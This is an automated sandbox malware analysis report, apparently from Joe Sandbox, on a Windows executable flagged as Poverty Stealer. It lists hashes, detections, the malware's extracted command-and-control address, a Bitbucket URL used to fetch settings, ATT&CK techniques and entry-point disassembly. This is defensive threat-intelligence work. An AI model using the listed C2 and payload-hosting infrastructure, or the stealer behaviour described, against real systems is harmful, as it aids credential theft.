
Windows Analysis Report
SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe

Overview

General Information

Sample name: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
Analysis ID: 1632699
MD5: f9fe873316a74e0d1c93357a904e133f
SHA1: d8a4387af178c7d9b4710c433d6d5c37b89c3d01
SHA256: b6cbf3bb81c4b91c2aa4552b4767106b9e9510e9e0cc21053913849882609e0c
Tags: exe, user-SecuriteInfoCom

Detection

Poverty Stealer
Score: 72
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Poverty Stealer
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Classification chart categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner (levels: clean, suspicious, malicious)
  • System is w10x64
  • cleanup
{
  "C2 url": "185.244.212.106:2227"
}
Source | Rule | Description | Author | Strings
00000000.00000003.1420376353.0000000002F04000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PovertyStealer | Yara detected Poverty Stealer | Joe Security |
00000000.00000003.1420412965.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PovertyStealer | Yara detected Poverty Stealer | Joe Security |
Process Memory Space: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe PID: 8300 | JoeSecurity_PovertyStealer | Yara detected Poverty Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.3.unpack | JoeSecurity_PovertyStealer | Yara detected Poverty Stealer | Joe Security |
0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2ebb040.5.unpack | JoeSecurity_PovertyStealer | Yara detected Poverty Stealer | Joe Security |
0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.6.unpack | JoeSecurity_PovertyStealer | Yara detected Poverty Stealer | Joe Security |
0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.1.unpack | JoeSecurity_PovertyStealer | Yara detected Poverty Stealer | Joe Security |
                No Sigma rule has matched
                No Suricata rule has matched


                AV Detection

Source: 00000000.00000003.1420376353.0000000002F04000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Poverty Stealer {"C2 url": "185.244.212.106:2227"}
Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Virustotal: Detection: 29%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: H:\new Stub C++ for panel\Release\BigProject.pdb) source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
Source: Binary string: H:\new Stub C++ for panel\Release\BigProject.pdb source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: 0_2_0031F791 FindFirstFileExW,0_2_0031F791

                Networking

Source: Malware configuration extractor | URLs: 185.244.212.106:2227
Source: Joe Sandbox View | IP Address: 185.166.143.48
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: 0_2_003042E0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenA,InternetOpenUrlA,FreeLibrary,InternetReadFile,InternetReadFile,FreeLibrary,0_2_003042E0
Source: global traffic | HTTP traffic detected: GET /microsoftingsoftwares/faw/raw/35a4772e22b353e621019b578e4e1bce5ba5d748/settings HTTP/1.1; Accept: */*; User-Agent: Chrome/95.0.4638.54; Host: bitbucket.org
Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000002.1422217807.0000000002E90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/
Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1421372610.00000000013CF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/microsoftingsoftwares/faw/raw/35a4772e22b353e621019b578e4e1bce5ba5d748/setting
Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000002.1422217807.0000000002E90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/t
Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1420456885.0000000002EC7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1420412965.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: String function: 0030D970 appears 48 times
Source: classification engine | Classification label: mal72.troj.winEXE@2/0@1/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Command line argument: 0<3 | 0_2_003059A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Command line argument: =3 | 0_2_003059A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Command line argument: =3 | 0_2_003059A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Command line argument: =3 | 0_2_003059A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Command line argument: =3 | 0_2_003059A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Command line argument: =3 | 0_2_003059A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Command line argument: 0<3 | 0_2_003059A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Command line argument: user32.dll | 0_2_003059A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Command line argument: Nr2 | 0_2_003271A0
Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Section loaded: apphelp.dll, cryptbase.dll, uxtheme.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: 0_2_003059A0 GetTickCount,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,KiUserCallbackDispatcher,FreeLibrary,GetTickCount,Sleep,MessageBoxW,Concurrency::cancel_current_task,0_2_003059A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: 0_2_0030B122 pushad ; retn 0032h 0_2_0030B123
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: 0_2_0030D5CE push ecx; ret 0_2_0030D5E1
Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1420771923.0000000001387000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1420497399.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1421107805.0000000001387000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000002.1422270188.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1421181026.0000000001387000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1421265311.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000002.1421992949.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1421372610.00000000013CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: 0_2_003115E3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003115E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: 0_2_003024D0 mov eax, dword ptr fs:[00000030h] 0_2_003024D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: 0_2_0032037D GetProcessHeap,0_2_0032037D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: 0_2_0030D905 SetUnhandledExceptionFilter,0_2_0030D905
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: 0_2_0030DB13 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0030DB13
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: 0_2_0030D779 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0030D779
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_003228A3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: EnumSystemLocalesW,0_2_0031A9E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: EnumSystemLocalesW,0_2_003221DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: EnumSystemLocalesW,0_2_00322225
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: EnumSystemLocalesW,0_2_003222C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0032234B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: GetLocaleInfoW,0_2_0032259E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: GetLocaleInfoW,0_2_0031AE90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_003226C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00321F2E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: GetLocaleInfoW,0_2_003227CD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | Code function: 0_2_003138B9 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_003138B9

                Stealing of Sensitive Information

Source: Yara match | File source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2ebb040.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1420376353.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1420412965.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe PID: 8300, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2ebb040.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1420376353.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1420412965.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe PID: 8300, type: MEMORYSTR

Technique matrix by tactic (a number in brackets is the count shown beside that technique in the report):
• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
• Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
• Execution: Command and Scripting Interpreter [2]; Native API [1]; At; Cron
• Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
• Privilege Escalation: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
• Defense Evasion: Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; DLL Side-Loading [1]; Binary Padding
• Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
• Discovery: System Time Discovery [1]; Security Software Discovery [21]; File and Directory Discovery [1]; System Information Discovery [12]
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
• Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture
• Command and Control: Encrypted Channel [11]; Ingress Tool Transfer [2]; Non-Application Layer Protocol [2]; Application Layer Protocol [13]
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction

Behavior graph (ID: 1632699; Sample: SecuriteInfo.com.Variant.Fr...; Startdate: 08/03/2025; Architecture: WINDOWS; Score: 72): SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe started; DNS/IP node: bitbucket.org 185.166.143.48, 443, 49707 AMAZON-02US Germany; signatures: Found malware configuration, Multi AV Scanner detection for submitted file, Yara detected Poverty Stealer, 2 other signatures.

Source | Detection | Scanner | Label
SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe | 29% | Virustotal |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
185.244.212.106:2227 | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
bitbucket.org | 185.166.143.48 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://bitbucket.org/microsoftingsoftwares/faw/raw/35a4772e22b353e621019b578e4e1bce5ba5d748/settings | false | | high
185.244.212.106:2227 | true | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://bitbucket.org/ | SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000002.1422217807.0000000002E90000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bitbucket.org/microsoftingsoftwares/faw/raw/35a4772e22b353e621019b578e4e1bce5ba5d748/setting | SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1421372610.00000000013CF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bitbucket.org/t | SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000002.1422217807.0000000002E90000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dz8aopenkvv6s.cloudfront.net | SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1420456885.0000000002EC7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1420412965.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
185.166.143.48 | bitbucket.org | Germany | 16509 | AMAZON-02US | false

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1632699
Start date and time: 2025-03-08 23:23:19 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
Detection: MAL
Classification: mal72.troj.winEXE@2/0@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 14
• Number of non-executed functions: 53
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
No simulations
                            Match | Associated Sample Name / URL | Detection | Threat Name | Context
                            185.166.143.48 | http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt | malicious | Unknown | bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt

                            Match | Associated Sample Name / URL | Detection | Threat Name | Context
                            bitbucket.org | Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg | malicious | ScreenConnect Tool | 185.166.143.48
                            bitbucket.org | Lead.Upload.Report.Feb.2025.exe | malicious | Unknown | 185.166.143.48
                            bitbucket.org | https://bridesrilanka.com/myreservedroom | malicious | ScreenConnect Tool | 185.166.143.48
                            bitbucket.org | phish_alert_iocp_v1.4.48 - 2025-03-05T101050.751.eml | malicious | ScreenConnect Tool | 185.166.143.49
                            bitbucket.org | MCxU5Fj.exe | malicious | LummaC Stealer | 185.166.143.50
                            bitbucket.org | soft.exe | malicious | GCleaner, LummaC Stealer, Socks5Systemz | 185.166.143.48
                            bitbucket.org | foUENR5vt.exe | malicious | LummaC Stealer | 185.166.143.50
                            bitbucket.org | 67c2163c9db39.vbs | malicious | LummaC Stealer | 185.166.143.48
                            bitbucket.org | http://getgreenshot.org | malicious | Unknown | 185.166.143.48
                            bitbucket.org | MqJtm7S3o1.doc | malicious | RedLine | 185.166.143.49

                            Match | Associated Sample Name / URL | Detection | Threat Name | Context
                            AMAZON-02US | sh4.elf | malicious | Mirai | 18.180.172.177
                            AMAZON-02US | arm.elf | malicious | Mirai | 18.182.140.102
                            AMAZON-02US | m68k.elf | malicious | Mirai | 18.227.209.61
                            AMAZON-02US | mpsl.elf | malicious | Mirai | 18.141.95.254
                            AMAZON-02US | spc.elf | malicious | Mirai | 18.190.141.61
                            AMAZON-02US | arm7.elf | malicious | Mirai | 13.53.253.2
                            AMAZON-02US | ppc.elf | malicious | Mirai | 13.127.50.187
                            AMAZON-02US | x86.elf | malicious | Mirai | 13.125.44.240
                            AMAZON-02US | na.elf | malicious | Prometei | 54.171.230.55
                            AMAZON-02US | combined.exe | malicious | Unknown | 52.219.152.12

                            Match | Associated Sample Name / URL | Detection | Threat Name | Context
                            37f463bf4616ecd445d4a1937da06e19 | SwitchAutoSetup_v0.7.0.3.exe | malicious | Vidar | 185.166.143.48
                            37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exe | malicious | Unknown | 185.166.143.48
                            37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exe | malicious | Unknown | 185.166.143.48
                            37f463bf4616ecd445d4a1937da06e19 | Magic_V_pro_setup_stable_latest_release_version_9_709.exe | malicious | LummaC Stealer | 185.166.143.48
                            37f463bf4616ecd445d4a1937da06e19 | Magic_V_pro_setup_stable_latest_release_version_9_709.exe | malicious | LummaC Stealer | 185.166.143.48
                            37f463bf4616ecd445d4a1937da06e19 | 1.exe | malicious | Unknown | 185.166.143.48
                            37f463bf4616ecd445d4a1937da06e19 | 1.exe | malicious | Unknown | 185.166.143.48
                            37f463bf4616ecd445d4a1937da06e19 | BWllpq4Tel.exe | malicious | GuLoader | 185.166.143.48
                            37f463bf4616ecd445d4a1937da06e19 | uK5pfobYyD.exe | malicious | DarkCloud | 185.166.143.48
                            37f463bf4616ecd445d4a1937da06e19 | MNLS4PjscF.exe | malicious | GuLoader | 185.166.143.48
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.578552636544814
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
                            File size:263'168 bytes
                            MD5:f9fe873316a74e0d1c93357a904e133f
                            SHA1:d8a4387af178c7d9b4710c433d6d5c37b89c3d01
                            SHA256:b6cbf3bb81c4b91c2aa4552b4767106b9e9510e9e0cc21053913849882609e0c
                            SHA512:f2b7ee2311896b27dc7bb86e8053130cbd903b3d1c0ef4c0788d46dfb9facc5757e21f611bcada16dc9bef567509e810b01c1ae79002aced8942dd04ba8fae80
                            SSDEEP:6144:cqvwbHMtaRWwVa2+B1fUaio83mMXSrlGhAOZpEBv:cqvwbPWwU2+XHkxhlEB
                            TLSH:2D448F01B5D1C872D972057158B4ABB95A3EB9200F7099FB53D41F3ECE706C0AB73A6A
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+...+...+...`.......`.......`...1...:K..=...:K..9...:K..d...`.......+...O....K..)....K..*...Rich+...........PE..L....M.g...
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x40d289
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x67CB4DAD [Fri Mar 7 19:49:01 2025 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:db3aeeba15dbf2707fad3ba5becf2830
                            Instruction
                            call 00007FF915233149h
                            jmp 00007FF91523284Fh
                            cmp ecx, dword ptr [0043F040h]
                            jne 00007FF9152329D3h
                            ret
                            jmp 00007FF91523326Fh
                            push ebp
                            mov ebp, esp
                            and dword ptr [0044033Ch], 00000000h
                            sub esp, 28h
                            or dword ptr [0043F018h], 01h
                            push 0000000Ah
                            call dword ptr [0042C058h]
                            test eax, eax
                            je 00007FF915232CDBh
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            lea edi, dword ptr [ebp-28h]
                            xor ecx, ecx
                            push ebx
                            cpuid
                            mov esi, ebx
                            pop ebx
                            nop
                            mov dword ptr [edi], eax
                            mov dword ptr [edi+04h], esi
                            mov dword ptr [edi+08h], ecx
                            xor ecx, ecx
                            mov dword ptr [edi+0Ch], edx
                            mov eax, dword ptr [ebp-28h]
                            mov edi, dword ptr [ebp-24h]
                            mov dword ptr [ebp-04h], eax
                            xor edi, 756E6547h
                            mov eax, dword ptr [ebp-1Ch]
                            xor eax, 49656E69h
                            mov dword ptr [ebp-18h], eax
                            mov eax, dword ptr [ebp-20h]
                            xor eax, 6C65746Eh
                            mov dword ptr [ebp-14h], eax
                            xor eax, eax
                            inc eax
                            push ebx
                            cpuid
                            mov esi, ebx
                            pop ebx
                            nop
                            lea ebx, dword ptr [ebp-28h]
                            mov dword ptr [ebx], eax
                            mov eax, dword ptr [ebp-18h]
                            or eax, dword ptr [ebp-14h]
                            or eax, edi
                            mov dword ptr [ebx+04h], esi
                            mov dword ptr [ebx+08h], ecx
                            mov dword ptr [ebx+0Ch], edx
                            jne 00007FF915232A0Bh
                            mov eax, dword ptr [ebp-28h]
                            and eax, 0FFF3FF0h
                            cmp eax, 000106C0h
                            je 00007FF9152329F5h
                            cmp eax, 00020660h
                            je 00007FF9152329EEh
                            cmp eax, 00020670h
                            je 00007FF9152329E7h
                            cmp eax, 00030650h
                            je 00007FF9152329E0h
                            cmp eax, 00000660h
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3da50 | 0x3c | .rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x41000 | 0x21f0 | .reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b190 | 0x70 | .rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x3b200 | 0x18 | .rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3b0d0 | 0x40 | .rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2c000 | 0x140 | .rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
